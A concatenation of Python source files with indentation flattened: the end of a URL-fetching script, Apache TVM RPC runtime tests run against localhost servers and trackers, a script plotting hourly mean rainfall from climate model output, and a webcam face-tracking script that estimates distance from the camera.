for url in fetch_urls(kw, 1, pages):
queue.put(url)
for i in range(len(threads)):
queue.put(None)
for t in threads:
t.join()
if __name__ == '__main__':
main()
|
test_runtime_rpc.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm import te
import tvm.testing
import multiprocessing
import os
import stat
import sys
import time
import pytest
import numpy as np
from tvm import rpc
from tvm.relay.backend import Runtime
from tvm.contrib import utils, cc
from tvm.rpc.tracker import Tracker
from tvm.rpc.proxy import Proxy
if __name__ == "__main__":
# NOTE: must live here to avoid registering PackedFunc with libtvm.so twice.
sys.exit(pytest.main([__file__] + sys.argv[1:]))
# tkonolige: The issue as I understand it is this: multiprocessing's spawn
# method launches a new process and then imports the relevant modules. This
# means that all registered functions must exist at the top level scope. In
# this file they are, so all is well when we run this file directly.
# However, when run under pytest, the functions aren't registered on the
# server. I believe this is because pytest is also using multiprocessing to
# run individual functions. Somewhere along the way, the imports are being
# lost, so the server ends up not registering the functions.
pytestmark = pytest.mark.skipif(
# Windows does not support fork so we can enable Windows for testing
sys.platform.startswith("win") == False and multiprocessing.get_start_method() != "fork",
reason=(
"pytest + multiprocessing spawn method causes tvm.register_func to "
"not work on the rpc.Server."
),
)
# NOTE: When writing tests, wrap remote related checking in a sub-function
# to ensure all the remote resources destructs before the server terminates
@tvm.testing.requires_rpc
def test_bigendian_rpc():
"""Test big endian rpc when there is a PowerPC RPC server available"""
host = os.environ.get("TVM_POWERPC_TEST_HOST", None)
port = os.environ.get("TVM_POWERPC_TEST_PORT", 9090)
if host is None:
return
def verify_rpc(remote, target, shape, dtype):
A = te.placeholder(shape, dtype=dtype)
B = te.compute(A.shape, lambda i: A[i] + tvm.tir.const(1, A.dtype))
s = te.create_schedule(B.op)
f = tvm.build(s, [A, B], target, name="myadd")
dev = remote.cpu(0)
a = tvm.nd.array(np.random.randint(0, 256, size=shape).astype(A.dtype), device=dev)
b = tvm.nd.array(np.zeros(shape).astype(A.dtype), device=dev)
temp = utils.tempdir()
path_dso = temp.relpath("dev_lib.o")
f.save(path_dso)
remote.upload(path_dso)
f = remote.load_module("dev_lib.o")
f(a, b)
tvm.testing.assert_allclose(a.numpy() + 1, b.numpy())
print("Test RPC connection to PowerPC...")
remote = rpc.connect(host, port)
target = "llvm -mtriple=powerpc-linux-gnu"
for dtype in ["float32", "float64", "int32", "int8"]:
verify_rpc(remote, target, (10,), dtype)
@tvm.testing.requires_rpc
def test_rpc_simple():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
def check_remote():
f1 = client.get_function("rpc.test.addone")
assert f1(10) == 11
f3 = client.get_function("rpc.test.except")
with pytest.raises(tvm._ffi.base.TVMError):
f3("abc")
f2 = client.get_function("rpc.test.strcat")
assert f2("abc", 11) == "abc:11"
check_remote()
@tvm.testing.requires_rpc
def test_rpc_simple_wlog():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1", enable_logging=True)
def check_remote():
f1 = client.get_function("rpc.test.addone")
assert f1(10) == 11
f3 = client.get_function("rpc.test.except")
with pytest.raises(tvm._ffi.base.TVMError):
f3("abc")
f2 = client.get_function("rpc.test.strcat")
assert f2("abc", 11) == "abc:11"
check_remote()
@tvm.testing.requires_rpc
def test_rpc_runtime_string():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
def check_remote():
func = client.get_function("rpc.test.runtime_str_concat")
x = tvm.runtime.container.String("abc")
y = tvm.runtime.container.String("def")
assert str(func(x, y)) == "abcdef"
check_remote()
@tvm.testing.requires_rpc
def test_rpc_array():
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
def check_remote():
x = np.ones((3, 4))
r_cpu = tvm.nd.array(x, remote.cpu(0))
assert str(r_cpu.device).startswith("remote")
np.testing.assert_equal(r_cpu.numpy(), x)
fremote = remote.get_function("rpc.test.remote_array_func")
fremote(r_cpu)
check_remote()
@tvm.testing.requires_rpc
def test_rpc_large_array():
# testcase of large array creation
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
def check_remote():
dev = remote.cpu(0)
a_np = np.ones((5041, 720)).astype("float32")
b_np = np.ones((720, 192)).astype("float32")
a = tvm.nd.array(a_np, dev)
b = tvm.nd.array(b_np, dev)
np.testing.assert_equal(a.numpy(), a_np)
np.testing.assert_equal(b.numpy(), b_np)
check_remote()
@tvm.testing.requires_rpc
def test_rpc_echo():
def check(remote):
fecho = remote.get_function("testing.echo")
assert fecho(1, 2, 3) == 1
assert fecho(100, 2, 3) == 100
assert fecho("xyz") == "xyz"
assert bytes(fecho(bytearray(b"123"))) == b"123"
with pytest.raises(RuntimeError):
raise_err = remote.get_function("testing.test_raise_error_callback")("RuntimeError")
raise_err()
remote.cpu().sync()
with pytest.raises(AttributeError):
f3 = remote.system_lib()["notexist"]
temp = rpc.server._server_env([])
server = rpc.Server()
client = rpc.connect("127.0.0.1", server.port)
check(rpc.LocalSession())
check(client)
def check_minrpc():
if tvm.get_global_func("rpc.CreatePipeClient", allow_missing=True) is None:
return
# Test minrpc server.
temp = utils.tempdir()
minrpc_exec = temp.relpath("minrpc")
tvm.rpc.with_minrpc(cc.create_executable)(minrpc_exec, [])
check(rpc.PopenSession(minrpc_exec))
# minrpc on the remote
server = rpc.Server()
client = rpc.connect(
"127.0.0.1",
server.port,
session_constructor_args=["rpc.PopenSession", open(minrpc_exec, "rb").read()],
)
check(client)
check_minrpc()
@tvm.testing.requires_rpc
def test_rpc_file_exchange():
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
def check_remote():
blob = bytearray(np.random.randint(0, 10, size=(10)))
remote.upload(blob, "dat.bin")
rev = remote.download("dat.bin")
assert rev == blob
check_remote()
@tvm.testing.requires_rpc
@tvm.testing.requires_llvm
def test_rpc_remote_module():
# graph
n = tvm.runtime.convert(102)
A = te.placeholder((n,), name="A")
B = te.compute(A.shape, lambda *i: A(*i) + 1.0, name="B")
s = te.create_schedule(B.op)
server0 = rpc.Server(key="x0")
server1 = rpc.Server(key="x1")
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.Connect", "127.0.0.1", server1.port, "x1", False],
)
def check_remote(remote):
temp = utils.tempdir()
dev = remote.cpu(0)
f = tvm.build(s, [A, B], "llvm", name="myadd")
path_dso = temp.relpath("dev_lib.so")
f.export_library(path_dso)
remote.upload(path_dso)
f1 = remote.load_module("dev_lib.so")
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
time_f = f1.time_evaluator(f1.entry_name, remote.cpu(0), number=10)
cost = time_f(a, b).mean
print("%g secs/op" % cost)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
# Download the file from the remote
path_tar = temp.relpath("dev_lib.tar")
f.export_library(path_tar)
remote.upload(path_tar)
local_download_path = temp.relpath("dev_lib.download.so")
with open(local_download_path, "wb") as fo:
fo.write(remote.download_linked_module("dev_lib.tar"))
fupdated = tvm.runtime.load_module(local_download_path)
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), tvm.cpu(0))
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), tvm.cpu(0))
fupdated(a, b)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
def check_minrpc():
if tvm.get_global_func("rpc.CreatePipeClient", allow_missing=True) is None:
return
# export to minrpc
temp = utils.tempdir()
runtime = Runtime("cpp", {"system-lib": True})
f = tvm.build(s, [A, B], "llvm", name="myadd", runtime=runtime)
path_minrpc = temp.relpath("dev_lib.minrpc")
f.export_library(path_minrpc, rpc.with_minrpc(cc.create_executable))
with pytest.raises(RuntimeError):
rpc.PopenSession("filenotexist")
# statrt the minrpc session.
remote = tvm.rpc.PopenSession(path_minrpc)
dev = remote.cpu(0)
f1 = remote.system_lib()
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
time_f = f1.time_evaluator("myadd", remote.cpu(0), number=1)
cost = time_f(a, b).mean
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
# change to not executable
os.chmod(path_minrpc, stat.S_IRUSR)
with pytest.raises(RuntimeError):
rpc.PopenSession(path_minrpc)
def check_remote_link_cl(remote):
"""Test function to run remote code such as cl
This is not enabled because there is forking issue
of TVM runtime when server launches after OpenCL
runtime initializes. We leave it as an example
on how to do rpc when we want to do linking on remote.
"""
if not tvm.testing.device_enabled("opencl"):
print("Skip because opencl is not enabled")
return
temp = utils.tempdir()
dev = remote.cl(0)
s = te.create_schedule(B.op)
xo, xi = s[B].split(B.op.axis[0], factor=32)
s[B].bind(xo, te.thread_axis("blockIdx.x"))
s[B].bind(xi, te.thread_axis("threadIdx.x"))
f = tvm.build(s, [A, B], "opencl --host=llvm", name="myadd")
# Option 1: save modules separately and rely on remote compiler
path_o = temp.relpath("myadd.o")
path_cl = temp.relpath("myadd.cl")
path_json = temp.relpath("myadd.tvm_meta.json")
f.save(path_o)
f.imported_modules[0].save(path_cl)
remote.upload(path_o)
remote.upload(path_cl)
# upload meta data
remote.upload(path_json)
fhost = remote.load_module("myadd.o")
fdev = remote.load_module("myadd.cl")
fhost.import_module(fdev)
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
fhost(a, b)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
# Option 2: export library as a tar ball then handled by remote compiler
path_tar = temp.relpath("myadd.tar")
f.export_library(path_tar)
remote.upload(path_tar)
fhost = remote.load_module("myadd.tar")
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
fhost(a, b)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
check_remote(rpc.LocalSession())
check_remote(client)
check_minrpc()
@tvm.testing.requires_rpc
def test_rpc_return_func():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
def check_remote():
f1 = client.get_function("rpc.test.add_to_lhs")
fadd = f1(10)
assert fadd(12) == 22
check_remote()
@tvm.testing.requires_rpc
def test_rpc_session_constructor_args():
# start server
server0 = rpc.Server(key="x0")
server1 = rpc.Server(key="x1")
def check_multi_hop():
# use server0 as proxy to connect to server1
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.Connect", "127.0.0.1", server1.port, "x1", False],
)
fecho = client.get_function("testing.echo")
assert fecho(1, 2, 3) == 1
assert fecho(100, 2, 3) == 100
assert fecho("xyz") == "xyz"
assert bytes(fecho(bytearray(b"123"))) == b"123"
nd = tvm.nd.array([1, 2, 3], device=client.cpu(0))
assert nd.numpy()[1] == 2
def check_error_handling():
with pytest.raises(tvm.error.RPCError):
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.NonExistingConstructor"],
)
check_multi_hop()
check_error_handling()
@tvm.testing.requires_rpc
def test_rpc_return_ndarray():
# start server
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
m = client.get_function("rpc.test.remote_return_nd")
get_arr = m("get_arr")
ref_count = m("ref_count")
get_elem = m("get_elem")
get_arr_elem = m("get_arr_elem")
# array test
def run_arr_test():
arr = get_arr()
assert get_elem(0) == 0.0
assert get_arr_elem(arr, 0) == 0.0
run_arr_test()
@tvm.testing.requires_rpc
def test_local_func():
client = rpc.LocalSession()
def check_remote():
f1 = client.get_function("rpc.test.add_to_lhs")
fadd = f1(10)
assert fadd(12) == 22
blob = bytearray(np.random.randint(0, 10, size=(10)))
client.upload(blob, "dat.bin")
rev = client.download("dat.bin")
assert rev == blob
check_remote()
@tvm.testing.requires_rpc
def test_rpc_tracker_register():
# test registration
tracker = Tracker(port=9000, port_end=10000)
device_key = "test_device"
server1 = rpc.Server(
host="127.0.0.1",
port=9000,
port_end=10000,
key=device_key,
tracker_addr=("127.0.0.1", tracker.port),
)
server2 = rpc.Server(
host="127.0.0.1",
port=9000,
port_end=10000,
key=device_key,
tracker_addr=("127.0.0.1", tracker.port),
custom_addr="test_addr", # this is a test address, which is unable to connect
)
time.sleep(1)
client = rpc.connect_tracker("127.0.0.1", tracker.port)
def exist_address(summary, key, host, port):
server_info = summary["server_info"]
for device in server_info:
if device["key"] == "server:%s" % key:
addr = device["addr"]
if (host is None or host == addr[0]) and port == addr[1]:
return True
return False
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 2
assert exist_address(summary, device_key, "127.0.0.1", server1.port)
assert exist_address(summary, device_key, "test_addr", server2.port)
remote = client.request(device_key)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 1
del remote
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 2
server1.terminate()
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 1
assert not exist_address(summary, device_key, "127.0.0.1", server1.port)
assert exist_address(summary, device_key, "test_addr", server2.port)
server2.terminate()
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert not exist_address(summary, device_key, "test_addr", server2.port)
tracker.terminate()
def _target(host, port, device_key, timeout):
client = rpc.connect_tracker(host, port)
remote = client.request(device_key, session_timeout=timeout)
while True:
pass
remote.cpu()
@tvm.testing.requires_rpc
def test_rpc_tracker_request():
# test concurrent request
tracker = Tracker(port=9000, port_end=10000)
device_key = "test_device"
server = rpc.Server(
port=9000,
port_end=10000,
key=device_key,
tracker_addr=("127.0.0.1", tracker.port),
)
client = rpc.connect_tracker("127.0.0.1", tracker.port)
proc1 = multiprocessing.Process(target=_target, args=("127.0.0.1", tracker.port, device_key, 4))
proc2 = multiprocessing.Process(
target=_target, args=("127.0.0.1", tracker.port, device_key, 200)
)
proc1.start()
time.sleep(0.5)
proc2.start()
time.sleep(0.5)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert summary["queue_info"][device_key]["pending"] == 1
proc1.terminate()
proc1.join()
time.sleep(0.5)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert summary["queue_info"][device_key]["pending"] == 0
proc2.terminate()
proc2.join()
server.terminate()
tracker.terminate()
@tvm.testing.requires_rpc
def test_rpc_tracker_via_proxy():
"""
tracker
/ \
Host -- Proxy -- RPC server
"""
device_key = "test_device"
tracker_server = Tracker(port=9000, port_end=9100)
proxy_server = Proxy(
host=tracker_server.host,
port=8888,
port_end=8988,
tracker_addr=(tracker_server.host, tracker_server.port),
)
server1 = rpc.Server(
host=proxy_server.host,
port=proxy_server.port,
key=device_key,
tracker_addr=(tracker_server.host, tracker_server.port),
is_proxy=True,
)
server2 = rpc.Server(
host=proxy_server.host,
port=proxy_server.port,
key=device_key,
tracker_addr=(tracker_server.host, tracker_server.port),
is_proxy=True,
)
client = rpc.connect_tracker(tracker_server.host, tracker_server.port)
remote1 = client.request(device_key, session_timeout=30) # pylint: disable=unused-variable
remote2 = client.request(device_key, session_timeout=30) # pylint: disable=unused-variable
server2.terminate()
server1.terminate()
proxy_server.terminate()
tracker_server.terminate()
|
plot_from_pp_avg5216_regrid_3_hourly.py
|
"""
Load pp, plot and save
"""
import os, sys
import matplotlib
matplotlib.use('Agg') # Must be before importing matplotlib.pyplot or pylab!
from matplotlib import rc
from matplotlib.font_manager import FontProperties
from matplotlib import rcParams
from mpl_toolkits.basemap import Basemap
rc('font', family = 'serif', serif = 'cmr10')
rc('text', usetex=True)
rcParams['text.usetex']=True
rcParams['text.latex.unicode']=True
rcParams['font.family']='serif'
rcParams['font.serif']='cmr10'
import matplotlib.pyplot as plt
#from matplotlib import figure
import matplotlib as mpl
import matplotlib.cm as mpl_cm
import numpy as np
import iris
import iris.coords as coords
import iris.quickplot as qplt
import iris.plot as iplt
import iris.coord_categorisation
import iris.unit as unit
import cartopy.crs as ccrs
import cartopy.io.img_tiles as cimgt
import matplotlib.ticker as mticker
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import datetime
from mpl_toolkits.basemap import cm
import imp
from textwrap import wrap
import re
import iris.analysis.cartography
import math
from dateutil import tz
#import multiprocessing as mp
import gc
import types
save_path='/nfs/a90/eepdw/Figures/EMBRACE/'
model_name_convert_title = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/model_name_convert_title.py')
unrotate = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/unrotate_pole.py')
pp_file = 'rain_mean_by_hour'
degs_crop_top = 1.7
degs_crop_bottom = 2.5
min_contour = 0
max_contour = 3
tick_interval=0.3
figprops = dict(figsize=(8,8), dpi=360)
clevs = np.linspace(min_contour, max_contour,256)
cmap=cm.s3pcpn_l
ticks = (np.arange(min_contour, max_contour+tick_interval,tick_interval))
u = unit.Unit('hours since 1970-01-01 00:00:00',calendar='gregorian')
dx, dy = 10, 10
divisor=10 # for lat/lon rounding
def main():
#experiment_ids = ['djznw', 'djzny', 'djznq', 'djzns', 'dkjxq', 'dklyu', 'dkmbq', 'dklwu', 'dklzq', 'dkbhu', 'djznu', 'dkhgu' ] # All 12
#experiment_ids = ['djzny', 'djzns', 'djznw', 'dkjxq', 'dklyu', 'dkmbq', 'dklwu', 'dklzq' ]
#experiment_ids = ['djzny', 'djzns', 'djznu', 'dkbhu', 'dkjxq', 'dklyu', 'dkmbq', 'dklwu', 'dklzq', 'dkhgu']
#experiment_ids = ['djzns', 'djznu', 'dkbhu', 'dkjxq', 'dklyu', 'dkmbq', 'dklwu', 'dklzq', 'dkhgu']
experiment_ids = ['dklzq', 'dkmbq', 'dkjxq', 'dklwu', 'dklyu', 'djzns']
#experiment_ids = ['djzns' ]
#experiment_ids = ['dkhgu','dkjxq']
for experiment_id in experiment_ids:
model_info=re.sub('(.{68} )', '\\1\n', str(model_name_convert_title.main(experiment_id)), 0, re.DOTALL)
expmin1 = experiment_id[:-1]
pfile = '/nfs/a90/eepdw/Data/EMBRACE/Mean_State/pp_files/%s/%s/%s.pp' % (expmin1, experiment_id, pp_file)
#pc = iris(pfile)
pcube = iris.load_cube(pfile)
pcube=iris.analysis.maths.multiply(pcube,3600)
# For each hour in cube
# Get min and max latitude/longitude and unrotate to get min/max corners to crop plot automatically - otherwise end with blank bits on the edges
lats = pcube.coord('grid_latitude').points
lons = pcube.coord('grid_longitude').points
cs = pcube.coord_system('CoordSystem')
if isinstance(cs, iris.coord_systems.RotatedGeogCS):
print 'Rotated CS %s' % cs
lon_low= np.min(lons)
lon_high = np.max(lons)
lat_low = np.min(lats)
lat_high = np.max(lats)
lon_corners, lat_corners = np.meshgrid((lon_low, lon_high), (lat_low, lat_high))
lon_corner_u,lat_corner_u = unrotate.unrotate_pole(lon_corners, lat_corners, cs.grid_north_pole_longitude, cs.grid_north_pole_latitude)
lon_low = lon_corner_u[0,0]
lon_high = lon_corner_u[0,1]
lat_low = lat_corner_u[0,0]
lat_high = lat_corner_u[1,0]
else:
lon_low= np.min(lons)
lon_high = np.max(lons)
lat_low = np.min(lats)
lat_high = np.max(lats)
#lon_low= 62
#lon_high = 102
#lat_low = -7
#lat_high = 33
#lon_high_box = 101.866
#lon_low_box = 64.115
#lat_high_box = 33.
#lat_low_box =-6.79
#lon_high = 101.866
#lon_low = 64.115
#lat_high = 33.
#lat_low =-6.79
lon_low_tick=lon_low -(lon_low%divisor)
lon_high_tick=math.ceil(lon_high/divisor)*divisor
lat_low_tick=lat_low - (lat_low%divisor)
lat_high_tick=math.ceil(lat_high/divisor)*divisor
print lat_high_tick
print lat_low_tick
for t, time_cube in enumerate(pcube.slices(['grid_latitude', 'grid_longitude'])):
print time_cube
# Get mid-point time of averages
h_max = u.num2date(time_cube.coord('time').bounds[0].max()).strftime('%H%M')
h_min = u.num2date(time_cube.coord('time').bounds[0].min()).strftime('%H%M')
#Convert to India time
from_zone = tz.gettz('UTC')
to_zone = tz.gettz('Asia/Kolkata')
h_max_utc = u.num2date(time_cube.coord('time').bounds[0].max()).replace(tzinfo=from_zone)
h_min_utc = u.num2date(time_cube.coord('time').bounds[0].min()).replace(tzinfo=from_zone)
h_max_local = h_max_utc.astimezone(to_zone).strftime('%H%M')
h_min_local = h_min_utc.astimezone(to_zone).strftime('%H%M')
#m = u.num2date(time_cube.coord('time').bounds[0].mean()).minute
#h = u.num2date(time_cube.coord('time').bounds[0].mean()).hour
#if t==0:
fig = plt.figure(**figprops)
ax = plt.axes(projection=ccrs.PlateCarree(), extent=(lon_low,lon_high,lat_low+degs_crop_bottom,lat_high-degs_crop_top))
#ax = fig.axes(projection=ccrs.PlateCarree(), extent=(lon_low,lon_high,lat_low,lat_high))
#ax = fig.axes(projection=ccrs.PlateCarree())
cont = iplt.contourf(time_cube, clevs, cmap=cmap, extend='both')
#del time_cube
#fig.clabel(cont, fmt='%d')
#ax.stock_img()
ax.coastlines(resolution='110m', color='#262626')
gl = ax.gridlines(draw_labels=True,linewidth=0.5, color='#262626', alpha=0.5, linestyle='--')
gl.xlabels_top = False
gl.ylabels_right = False
#gl.xlines = False
dx, dy = 10, 10
gl.xlocator = mticker.FixedLocator(range(int(lon_low_tick),int(lon_high_tick)+dx,dx))
gl.ylocator = mticker.FixedLocator(range(int(lat_low_tick),int(lat_high_tick)+dy,dy))
gl.xformatter = LONGITUDE_FORMATTER
gl.yformatter = LATITUDE_FORMATTER
gl.xlabel_style = {'size': 12, 'color':'#262626'}
#gl.xlabel_style = {'color': '#262626', 'weight': 'bold'}
gl.ylabel_style = {'size': 12, 'color':'#262626'}
cbar = fig.colorbar(cont, orientation='horizontal', pad=0.05, extend='both')
cbar.set_label('mm/h', fontsize=10, color='#262626')
#cbar.set_label(time_cube.units, fontsize=10, color='#262626')
cbar.set_ticks(np.arange(min_contour, max_contour+tick_interval,tick_interval))
cbar.set_ticklabels(['${%.1f}$' % i for i in ticks])
cbar.ax.tick_params(labelsize=10, color='#262626')
# fig.canvas.draw()
# background = fig.canvas.copy_from_bbox(fig.bbox)
# fig = plt.figure(frameon=False,**figprops)
# make sure frame is off, or everything in existing background
# will be obliterated.
# ax = fig.add_subplot(111,frameon=False)
# restore previous background.
# fig.canvas.restore_region(background)
# time_cube=iris.analysis.maths.multiply(time_cube,3600)
# cont = iplt.contourf(time_cube, clevs, cmap=cmap, extend='both')
#print cont.collections()
#################################################################
## Bug fix for Quad Contour set not having attribute 'set_visible'
# def setvisible(self,vis):
# for c in self.collections: c.set_visible(vis)
# cont.set_visible = types.MethodType(setvisible,)
# cont.axes = plt.gca()
# cont.figure=fig
####################################################################
#ims.append([im])
main_title='Mean Rainfall for EMBRACE Period -%s-%s UTC (%s-%s IST)' % (h_min, h_max, h_min_local, h_max_local)
#main_title=time_cube.standard_name.title().replace('_',' ')
#model_info = re.sub(r'[(\']', ' ', model_info)
#model_info = re.sub(r'[\',)]', ' ', model_info)
#print model_info
if not os.path.exists('%s%s/%s' % (save_path, experiment_id, pp_file)): os.makedirs('%s%s/%s' % (save_path, experiment_id, pp_file))
#fig.show()
fig.savefig('%s%s/%s/%s_%s_%s-%s_notitle.png' % (save_path, experiment_id, pp_file, experiment_id, pp_file, h_min, h_max), format='png', bbox_inches='tight')
plt.title('%s-%s UTC %s-%s IST' % (h_min,h_max, h_min_local, h_max_local))
fig.savefig('%s%s/%s/%s_%s_%s-%s_short_title.png' % (save_path, experiment_id, pp_file, experiment_id, pp_file, h_min, h_max), format='png', bbox_inches='tight')
plt.title('\n'.join(wrap('%s\n%s' % (main_title, model_info), 1000,replace_whitespace=False)), fontsize=16)
fig.savefig('%s%s/%s/%s_%s_%s-%s.png' % (save_path, experiment_id, pp_file, experiment_id, pp_file, h_min, h_max), format='png', bbox_inches='tight')
fig.clf()
plt.close()
#del time_cube
gc.collect()
if __name__ == '__main__':
main()
#proc=mp.Process(target=worker)
#proc.daemon=True
#proc.start()
#proc.join()
|
facial_recognition.py
|
import sys
import numpy as np
from skimage import transform as tf
import cv2
from threading import Thread
NUM_PYR = 2
WINDOW_AMT = 8
assert (float(WINDOW_AMT) / (2 ** NUM_PYR)).is_integer(), "WINDOW_AMT must remain an integer at all pyramid levels."
DISP_SCALE = 0.7
AVERAGE_FACE_WIDTH = 250
START_FACE_DIST = 310
RESCALING_FACTORS = [0.5, 1, 1.5]
ROT_AMTS = np.linspace(-45, 45, num=3)
class WebcamImageGetter:
def __init__(self):
self.currentFrame = None
self.capture = cv2.VideoCapture(0)
self.keep_going = True
def start(self):
Thread(target=self.updateFrame, args=()).start()
def updateFrame(self):
while self.keep_going:
ret, frame = self.capture.read()
if ret:
self.currentFrame= cv2.resize(frame, dsize=(0, 0), fx=DISP_SCALE, fy=DISP_SCALE)
def getFrame(self):
return self.currentFrame
class FacialRecognition:
def end(self):
cv2.destroyWindow("frame")
cv2.waitKey(1)
self.ig.keep_going = False
def run(self):
self.calibrate()
while True:
best_i, best_j, frame, interp_shape, interp_rot = self.get_face()
if self.init_interp_shape is None:
self.init_interp_shape = interp_shape
# Display bounding box
color = self.compute_interp_color(interp_shape)
cv2.rectangle(frame, (WINDOW_AMT*best_j, WINDOW_AMT*best_i), (WINDOW_AMT*best_j + self.w, WINDOW_AMT*best_i + self.h), color=color, thickness=2)
cv2.imshow("frame", frame)
if cv2.waitKey(1) & 0xFF == 10:
cv2.destroyWindow("frame")
self.ig.keep_going = False
break
def compute_interp_color(self, interp_shape):
amt = np.linalg.norm(interp_shape - self.init_interp_shape)
if interp_shape[0] < self.init_interp_shape[0]:
val = min(1.0, amt / 15.0)
return (255 * (1 - val), 255 * val, 0)
else:
val = min(1.0, amt / 15.0)
return (255 * (1 - val), 0, 255 * val)
def calibrate(self):
self.ig = WebcamImageGetter()
self.ig.start()
self.init_interp_shape = None
print "Place face 1 ft from camera. When face is visible, press Enter to continue."
while True:
frame = self.ig.getFrame()
if frame is None:
continue
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
face_cascade = cv2.CascadeClassifier("haarcascades/haarcascade_frontalface_default.xml")
faces = face_cascade.detectMultiScale(gray, scaleFactor=1.3, minNeighbors=5)
for x, y, w, h in faces:
cv2.rectangle(frame, (x, y), (x + w, y + h), color=(255, 0, 0), thickness=2)
cv2.imshow("calibration", frame)
if cv2.waitKey(1) & 0xFF == 10:
cv2.destroyWindow("calibration")
if len(faces) > 0:
break
else:
print "No face detected."
x, y, w, h = faces[0]
num_pix = float(w*h)
face_roi = frame[y:y+h, x:x+w]
rotated_faces = [tf.rotate(face_roi, angle=rot_ang) for rot_ang in ROT_AMTS]
self.rotated_face_pyramids = [list(tf.pyramid_gaussian(face, max_layer=NUM_PYR, downscale=2))
for face in rotated_faces]
scaled_faces = [tf.rescale(face_roi, scale=sc) for sc in RESCALING_FACTORS]
self.scaled_face_pyramids = [list(tf.pyramid_gaussian(face, max_layer=NUM_PYR, downscale=2))
for face in scaled_faces]
# scaled_weights are used for scaled_faces
self.scaled_weights = [num_pix / (sf.shape[0]*sf.shape[1]) for sf in scaled_faces]
# we observed that the small detector is too strong, so we penalize it more
self.scaled_weights[0] *= 1.5
# w = f*Y/Z --> f = wZ/Y
self.camera_f = w * START_FACE_DIST/AVERAGE_FACE_WIDTH
self.start_center = np.array((x + w/2.0, y+h/2.0))
self.w = w; self.h = h
cv2.destroyWindow("calibration")
cv2.waitKey(1)
cv2.destroyWindow("calibration")
cv2.waitKey(1)
print "Tracking face...press Enter to quit."
print "Red: close, green: far, blue: in between."
def get_face(self, do_rot=True, do_scale=True):
frame = self.ig.getFrame()
frame_pyramid = list(tf.pyramid_gaussian(frame, max_layer=NUM_PYR, downscale=2))
scale_ssds = {}
for i, face_pyramid in enumerate(self.scaled_face_pyramids):
if not do_scale and i != 1:
continue
res = self.determine_best_shift(face_pyramid, frame_pyramid)
best_i, best_j, best_ssd = res
scale_ssds[i] = (1.0 / (best_ssd * self.scaled_weights[i]), best_i, best_j, np.array(face_pyramid[0].shape))
if len(scale_ssds) == 3 or not do_scale:
best_i, best_j = scale_ssds[1][1], scale_ssds[1][2]
else:
best_i, best_j = scale_ssds[0][1], scale_ssds[0][2]
total = sum([v[0] for v in scale_ssds.values()])
interp_shape = sum([v[0] / total * v[3] for v in scale_ssds.values()])
rot_ssds = {}
for i, face_pyramid in enumerate(self.rotated_face_pyramids):
if not do_rot and i != 1:
continue
res = self.determine_best_shift(face_pyramid, frame_pyramid)
rot_best_i, rot_best_j, best_ssd = res
rot_ssds[i] = (1.0 / best_ssd, rot_best_i, rot_best_j, np.array(face_pyramid[0].shape))
total = sum([v[0] for v in rot_ssds.values()])
interp_rot = sum([v[0] / total * ROT_AMTS[k] for k, v in rot_ssds.items()])
return best_i, best_j, frame, interp_shape, interp_rot
def get_transforms(self, do_rot=True, do_scale=True, do_trans=True):
best_i, best_j, frame, interp_shape, interp_rot = self.get_face(do_rot, do_scale)
# Rotation amount
if self.init_interp_shape is None:
self.init_interp_shape = interp_shape
if do_trans:
center = (np.array((WINDOW_AMT*best_j, WINDOW_AMT*best_i)) + np.array((WINDOW_AMT*best_j + self.w, WINDOW_AMT*best_i + self.h))) / 2.0
disp = center - self.start_center
else:
disp = center - center
rot = np.arctan(disp/START_FACE_DIST) * (180 / np.pi) # change to actual face dist
